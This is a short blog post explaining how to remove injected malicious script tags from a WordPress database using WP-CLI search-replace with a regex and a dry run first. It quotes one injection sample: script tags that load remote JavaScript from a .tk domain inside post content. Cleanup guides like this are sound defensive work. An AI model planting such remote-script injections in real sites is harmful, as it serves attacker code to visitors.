Stanislav Khromov
This post will show how you can use the build in search-replace function in WP-CLI with regex matching to batch remove harmful content from your WordPress site. This means that you can remove hundreds or thousands of injections in a matter of seconds instead of going through content and dumps manually.
Example of post_content injection:
...
Lorem ipsum dolor sit amet. <script src="https://nameserverdom.tk/assdhdfer" type="text/javascript"></script><script src="https://nameserverdom.tk/assdhdfer" type="text/javascript"> </script>Lorem ipsum dolor sit amet.
...
Go to https://regex101.com/ and figure out a good regex that fits your type of defacement.
For the defacement above, I settled with:
<script.*?tk.*?<\/script>
Now it’s time to run WP-CLI to remove the defacement.
It’s always good to test first with the --dry-run flag, which simulates a run but doesn’t actually do any replacements.
wp search-replace '<script.*?tk.*?<\/script>' '' --all-tables --dry-run --report-changed-only --precise --regex --regex-delimiter='/'
WP-CLI will tell you how many replacements are expected. When you feel like you’ve got a good result, remove --dry-run and you get the final command to run:
wp search-replace '<script.*?tk.*?<\/script>' '' --all-tables --report-changed-only --precise --regex --regex-delimiter='/'
Related
Using Regex with WP CLI to Search & Replace in the Database
